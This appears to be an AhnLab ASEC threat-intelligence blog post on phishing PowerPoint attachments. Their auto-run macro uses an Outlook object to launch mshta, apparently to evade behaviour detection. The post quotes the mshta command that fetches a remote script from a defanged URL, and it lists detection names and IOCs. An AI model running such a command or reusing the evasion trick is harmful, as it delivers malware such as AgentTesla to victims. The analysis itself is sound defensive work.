The ASEC analysis team has recently discovered a change in malicious PowerPoint files that are continually being distributed. As same as before, they use the method of executing a malicious script using mshta.exe, but added is the utilization of outlook.exe during the process.
Malicious PowerPoint files are being distributed as attachments of phishing e-mails as shown below, and they contain information related to purchase inquiries. Also, the malicious PowerPoint file is disguised as a PDF extension like in the previous type.
- Name of distributed file
Purchase Inquiry_pdf.ppt
Phishing mail that contains malicious PPT fileWhen the malicious PowerPoint file is run, a notification appears where the user selects whether or not to include macro. Selecting include will run the malicious macro.
Running malicious macroThe malicious macro consists of simple codes, and it is automatically run by the Auto_Open() function. This variant contains a process of creating an Outlook application object via CreateObject(“Outlook.Application”) and executing the mshta command.
Malicious macro (1)
Malicious macro (2)Ultimately, mshta is run by the outlook process, and the figure below is the process tree confirmed in RAPIT system.
Process tree confirmed in RAPIT systemThe mshta command is identical to the previous version as it connects to the Blogspot website that includes a malicious script. Additional malicious behavior cannot be checked as this website has now been deleted, but various malware such as AgentTesla can be run depending on the malicious script.
- Malicious Command
“C:\Windows\System32\mshta.exe” “hxxp://www.bitly.com/hdjalsdnbhagdehasd”
- Final URL
hxxps://orkyakroonmeinkyukartaahunthekat1.blogspot.com/p/charles123uuu.html
It appears that the change in the method of running the malicious commands via the outlook.exe process is to bypass behavior detection. Currently, V3 can perform behavior detection as shown below.
V3 behavior detectionAs malicious PowerPoint files have been continually distributed via phishing mails since last year, users need to take extra caution when dealing with unidentified files. Users should also refrain from opening files from unknown sources or running suspicious macro included in the file.
[File Detection]
- Downloader/PPT.Generic
[Behavior Detection]
- Execution/MDP.Mshta.M3815
[IOC Info]
- 0769e2f9ed19847d1195aa1f31e7ed4a
- hxxp://www.bitly.com/hdjalsdnbhagdehasd
- hxxps://orkyakroonmeinkyukartaahunthekat1.blogspot.com/p/charles123uuu.html
[Previous Blog Posts about Malicious PowerPoint Files]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post Malicious PowerPoint Macro using Outlook.exe Being Distributed appeared first on ASEC BLOG.
Article Link: Malicious PowerPoint Macro using Outlook.exe Being Distributed - ASEC BLOG